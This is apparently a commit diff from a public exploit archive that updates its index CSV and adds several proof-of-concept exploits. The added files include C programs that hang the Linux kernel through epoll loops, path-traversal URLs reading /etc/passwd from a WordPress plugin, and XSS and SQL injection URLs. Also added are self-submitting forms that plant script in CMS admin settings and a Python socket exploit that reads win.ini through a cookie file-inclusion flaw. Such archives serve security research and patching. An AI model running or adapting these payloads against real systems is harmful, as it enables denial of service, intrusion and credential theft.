Updated 12_02_2014

files.csv

@@ -450,14 +450,14 @@ id,file,description,date,author,platform,type,port
 585,platforms/windows/dos/585.pl,"MS Windows IIS WebDAV XML Denial of Service Exploit (MS04-030)",2004-10-20,"Amit Klein",windows,dos,0
 586,platforms/linux/local/586.c,"BitchX 1.0c19 Local Root Exploit (suid?)",2004-10-20,Sha0,linux,local,0
 587,platforms/linux/local/587.c,"Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit",2004-10-21,xCrZx,linux,local,0
-588,platforms/windows/remote/588.py,"Ability Server 2.34 FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21
+588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21
 589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0
 590,platforms/windows/remote/590.c,"ShixxNote 6.net Remote Buffer Overflow Exploit",2004-10-22,class101,windows,remote,2000
 591,platforms/linux/local/591.c,"socat <= 1.4.0.2 - Local Format String Exploit (not setuid)",2004-10-23,CoKi,linux,local,0
 592,platforms/windows/remote/592.py,"Ability Server <= 2.34 (APPE) Remote Buffer Overflow Exploit",2004-10-23,KaGra,windows,remote,21
 593,platforms/windows/dos/593.pl,"Quick 'n EasY VER 2.4 Ftp Server remote D.o.S",2004-10-24,KaGra,windows,dos,0
 594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service Exploit",2004-10-24,KaGra,windows,dos,0
-598,platforms/windows/remote/598.py,"MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25
+598,platforms/windows/remote/598.py,"MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25
 599,platforms/windows/dos/599.py,"BaSoMail Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0
 600,platforms/linux/local/600.c,"GD Graphics Library Heap Overflow Proof of Concept Exploit",2004-10-26,N/A,linux,local,0
 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit",2004-10-26,infamous41md,linux,local,0
@@ -9843,7 +9843,7 @@ id,file,description,date,author,platform,type,port
 10617,platforms/linux/dos/10617.txt,"Printoxx - Local Buffer Overflow",2009-12-23,sandman,linux,dos,0
 10618,platforms/windows/local/10618.py,"Adobe Reader and Acrobat",2009-12-23,"Ahmed Obied",windows,local,0
 10619,platforms/windows/local/10619.c,"Easy RM to MP3 27.3.700 local BOF xp sp2",2009-12-23,bibi-info,windows,local,0
-10620,platforms/windows/local/10620.py,"Easy RM to MP3 2.7.3.700 BoF Exploit",2009-12-23,dijital1,windows,local,0
+10620,platforms/windows/local/10620.py,"Easy RM to MP3 2.7.3.700 - BoF Exploit",2009-12-23,dijital1,windows,local,0
 10621,platforms/php/webapps/10621.txt,"XP Book 3.0 - login Admin Exploit",2009-12-23,"wlhaan hacker",php,webapps,0
 10624,platforms/php/webapps/10624.txt,"Joomla Component com_carman Cross Site Scripting Vulnerability",2009-12-24,FL0RiX,php,webapps,0
 10625,platforms/php/webapps/10625.txt,"Joomla Component com_jeemaarticlecollection SQL injection",2009-12-24,FL0RiX,php,webapps,0
@@ -31881,3 +31881,14 @@ id,file,description,date,author,platform,type,port
 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 'tagcloud' Parameter Cross Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0
 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 '.ksf' File Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0
 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x '.dps' File Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0
+35400,platforms/php/webapps/35400.txt,"BackWPup Plugin 1.4 for WordPress Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",php,webapps,0
+35401,platforms/php/webapps/35401.txt,"SnapProof 'retPageID' Parameter Cross Site Scripting Vulnerability",2011-02-28,"difficult 511",php,webapps,0
+35402,platforms/php/webapps/35402.txt,"Forritun Multiple SQL Injection Vulnerabilities",2011-03-02,eXeSoul,php,webapps,0
+35403,platforms/linux/dos/35403.c,"Linux Kernel 2.6.x epoll Nested Structures Local DoS",2011-03-02,"Nelson Elhage",linux,dos,0
+35404,platforms/linux/dos/35404.c,"Linux Kernel 2.6.x fs/eventpoll.c epoll Data Structure File Descriptor Local DoS",2011-03-02,"Nelson Elhage",linux,dos,0
+35405,platforms/php/webapps/35405.txt,"VidiScript 'vp' Parameter Cross Site Scripting Vulnerability",2011-03-02,NassRawI,php,webapps,0
+35406,platforms/php/webapps/35406.txt,"Support Incident Tracker (SiT!) 3.62 Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0
+35407,platforms/php/webapps/35407.txt,"phpWebSite 1.7.1 'local' Parameter Cross Site Scripting Vulnerability",2011-03-03,"AutoSec Tools",php,webapps,0
+35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
+35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
+35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 'IPLANG' Parameter Local File Include Vulnerability",2011-03-04,"AutoSec Tools",windows,remote,0

platforms/linux/dos/35403.c

@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/46630/info
+
+The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities.
+
+Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users. 
+
+#include <unistd.h>
+ #include <sys/epoll.h>
+ int main(void) {
+     int e1, e2, p[2];
+     struct epoll_event evt = {
+         .events = EPOLLIN
+     };
+     e1 = epoll_create(1);
+     e2 = epoll_create(2);
+     pipe(p);
+
+     epoll_ctl(e2, EPOLL_CTL_ADD, e1, &evt);
+     epoll_ctl(e1, EPOLL_CTL_ADD, p[0], &evt);
+     write(p[1], p, sizeof p);
+     epoll_ctl(e1, EPOLL_CTL_ADD, e2, &evt);
+
+     return 0;
+ }

platforms/linux/dos/35404.c

@@ -0,0 +1,75 @@
+source: http://www.securityfocus.com/bid/46630/info
+ 
+The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities.
+ 
+Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users. 
+
+#include <unistd.h>
+#include <sys/epoll.h>
+#include <sys/time.h>
+#include <stdio.h>
+
+#define SIZE 250
+
+int main(void) {
+
+	int links[SIZE];
+	int links2[SIZE];
+	int links3[SIZE];
+	int links4[SIZE];
+	int i, j;
+	int ret;
+	int ep1, ep2;
+	struct timeval start, end;
+
+	struct epoll_event evt = {
+		.events = EPOLLIN
+	};
+
+	ep1 = epoll_create(1);
+	for (i = 0; i < SIZE; i++) {
+		links[i] = epoll_create(1);
+		ret = epoll_ctl(ep1, EPOLL_CTL_ADD, links[i], &evt);
+		if (ret)
+			perror("error 1");
+	}
+	for (i = 0; i < SIZE; i++) {
+		links2[i] = epoll_create(1);
+		for (j = 0; j < SIZE; j++) {
+			epoll_ctl(links[j], EPOLL_CTL_ADD, links2[i], &evt);
+			if (ret)
+				perror("error 2");
+		}
+	}
+	for (i = 0; i < SIZE; i++) {
+		links3[i] = epoll_create(1);
+		for (j = 0; j < SIZE; j++) {
+			epoll_ctl(links2[j], EPOLL_CTL_ADD, links3[i], &evt);
+			if (ret)
+				perror("error 3");
+		}
+	}
+	for (i = 0; i < SIZE; i++) {
+		links4[i] = epoll_create(1);
+		for (j = 0; j < SIZE; j++) {
+			epoll_ctl(links3[j], EPOLL_CTL_ADD, links4[i], &evt);
+			if (ret)
+				perror("error 4");
+		}
+	}
+
+ 	ep2 = epoll_create(1);
+	gettimeofday(&start, NULL);
+	ret = epoll_ctl(ep2, EPOLL_CTL_ADD, ep1, &evt);
+	/* creates a loop */
+	//ret = epoll_ctl(links4[499], EPOLL_CTL_ADD, ep1, &evt);
+	if (ret)
+		perror("error 5");
+	gettimeofday(&end, NULL);
+
+	printf("%ld\n", ((end.tv_sec * 1000000 + end.tv_usec)
+		- (start.tv_sec * 1000000 + start.tv_usec)));
+
+	return 0;
+
+}

platforms/php/webapps/35400.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46610/info
+
+The BackWPup plugin for WordPress is prone to multiple information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Attackers can exploit these issues to retrieve the contents of an arbitrary file. Information obtained may aid in launching further attacks. 
+
+http://www.example.com/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1
+
+http://www.example.com/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd 

platforms/php/webapps/35401.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46622/info
+
+SnapProof is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/cart.php?retPageID=[XSS] 

platforms/php/webapps/35402.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/46629/info
+
+Forritun is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/grein.php?id=[sqli]
+http://www.example.com/rit.php?id=[sqli]
+http://www.example.com/index.php?id=[sqli]
+http://www.example.com/sida.php?id=[SQLi] 

platforms/php/webapps/35405.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46639/info
+
+VidiScript is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/index.php?vp=[XSS] 

platforms/php/webapps/35406.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/46671/info
+
+Support Incident Tracker (SiT!) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Support Incident Tracker (SiT!) 3.62 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sit-3.62/feedback.php?ax=--%3E%3Cscript%3Ealert(0)%3C%2fscript%3E 
+http://www.example.com/sit-3.62/lib/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E 
+http://www.example.com/sit-3.62/lib/magpierss/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E 
+http://www.example.com/sit-3.62/lib/magpierss/scripts/magpie_slashbox.php?rss_url=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E

platforms/php/webapps/35407.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46673/info
+
+phpWebSite is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+phpWebSite 1.7.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/phpwebsite_1_7_1/javascript/editors/fckeditor/editor/custom.php?local=%3Cscript%3Ealert(0)%3C%2fscript%3E http://www.example.com/phpwebsite_1_7_1/javascript/editors/fckeditor/editor/custom.php?local=%3Cscript%3Ealert(0)%3C%2fscript%3E 

platforms/php/webapps/35408.txt

@@ -0,0 +1,56 @@
+source: http://www.securityfocus.com/bid/46681/info
+
+xtcModified is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+xtcModified 1.05 is vulnerable; other versions may also be affected. 
+
+Cross-site scripting:
+
+http://www.example/admin/categories.php?search=prod"><script>alert(document.cookie)</script>
+http://www.example/admin/orders.php?selected_box=customers"><script>alert(document.cookie)</script>&status=0
+
+Html-injection:
+
+1. 
+
+<form action="http://www.example/admin/customers.php?cID=1&action=update" method="post" name="main">
+
+<input type="hidden" name="default_address_id" value="1">
+<input type="hidden" name="customers_gender" value="m">
+<input type="hidden" name="csID" value="">
+<input type="hidden" name="customers_firstname" value="FirstName">
+<input type="hidden" name="customers_lastname" value="LName">
+<input type="hidden" name="customers_dob" value="01/01/2007">
+<input type="hidden" name="customers_email_address" value="email@example.com">
+<input type="hidden" name="entry_company" value="company">
+<input type="hidden" name="entry_password" value="mypass">
+<input type="hidden" name="memo_title" value=&#039;mmtitle"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="memo_text" value=&#039;txt"><script>alert(document.cookie)</script>&#039;>
+
+</form>
+<script>
+document.main.submit();
+</script>
+
+
+2. 
+
+<form action="http://www.example/admin/configuration.php?gID=1&action=save" method="post" name="main">
+
+<input type="hidden" name="STORE_NAME" value=&#039;My Store"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="STORE_OWNER" value="Owner">
+<input type="hidden" name="STORE_OWNER_EMAIL_ADDRESS" value="email@example.com">
+<input type="hidden" name="STORE_COUNTRY" value="81">
+<input type="hidden" name="STORE_ZONE" value="80">
+<input type="hidden" name="EXPECTED_PRODUCTS_SORT" value="desc">
+<input type="hidden" name="EXPECTED_PRODUCTS_FIELD" value="date_expected">
+<input type="hidden" name="DISPLAY_CART" value="true">
+<input type="hidden" name="ADVANCED_SEARCH_DEFAULT_OPERATOR" value="and">
+<input type="hidden" name="STORE_NAME_ADDRESS" value="address">
+<input type="hidden" name="CURRENT_TEMPLATE" value="xtc5">
+</form>
+<script>
+document.main.submit();
+</script>

platforms/php/webapps/35409.txt

@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/46683/info
+
+Pragyan CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Pragyan CMS 3.0 beta is vulnerable; other versions may also be affected. 
+
+<form action="http://host/?page=/MY_PAGE_URL/&action=edit" method="post" name="main">
+<input type="hidden" name="CKEditor1" value=&#039;page content"><script>alert(document.cookie)</script>&#039;>
+</form>
+<script>
+document.main.submit();
+</script>
+
+
+<form action="http://host/?page=/&action=admin&subaction=global" method="post" name="main">
+<input type="hidden" name="cms_title" value="Pragyan CMS">
+<input type="hidden" name="cms_desc" value=&#039;desc3"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="cms_keywords" value=&#039;Pragyan CMS"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="cms_footer" value=&#039;Powered by Praygan CMS"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="cms_email" value="email@example.com">
+<input type="hidden" name="default_template" value="crystalx">
+<input type="hidden" name="update_global_settings" value="">
+</form>
+<script>
+document.main.submit();
+</script>

platforms/windows/remote/34668.txt

@@ -23,4 +23,4 @@ http://localhost:80/?search=%00{.exec|cmd.}
 will stop regex from parse macro , and macro will be executed and remote code injection happen.
 
 
-## EDB Note: This vulnerability will run the payload multiple times. Make sure to take this into consideration when crafting your payload.
+## EDB Note: This vulnerability will run the payload multiple times simultaneously. Make sure to take this into consideration when crafting your payload (and/or listener).

platforms/windows/remote/35410.py

@@ -0,0 +1,56 @@
+source: http://www.securityfocus.com/bid/46759/info
+
+InterPhoto Image Gallery is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+InterPhoto Image Gallery 2.4.2 is vulnerable; other versions may also be affected. 
+
+# ------------------------------------------------------------------------
+# Software................InterPhoto 2.4.2
+# Vulnerability...........Local File Inclusion
+# Threat Level............Critical (4/5)
+# Download................http://www.weensoft.com/
+# Release Date............3/4/2011
+# Tested On...............Windows Vista + XAMPP
+# ------------------------------------------------------------------------
+# Author..................AutoSec Tools
+# Site....................http://www.autosectools.com/
+# Email...................John Leitch <john@autosectools.com>
+# ........................Bryce Darling <bryce@autosectools.com>
+# ------------------------------------------------------------------------
+# 
+# 
+# --Description--
+# 
+# A local file inclusion vulnerability in InterPhoto 2.4.2 can be
+# exploited to include arbitrary files.
+# 
+# 
+# --PoC--
+
+import socket
+
+host = 'localhost'
+path = '/interphoto'
+port = 80
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, port))
+s.settimeout(8)    
+
+s.send('POST ' + path + '/about.php HTTP/1.1\r\n'
+    'Host: localhost\r\n'
+    'Connection: keep-alive\r\n'
+    'User-Agent: x\r\n'
+    'Content-Length: 0\r\n'
+    'Cache-Control: max-age=0\r\n'
+    'Origin: null\r\n'
+    'Content-Type: multipart/form-data; boundary=----x\r\n'
+    'Cookie: IPLANGV6O1or24t6cI=' + '..%2f' * 8 + 'windows%2fwin.ini%00\r\n'
+    'Accept: text/html\r\n'
+    'Accept-Language: en-US,en;q=0.8\r\n'
+    'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
+    '\r\n')
+
+print s.recv(8192)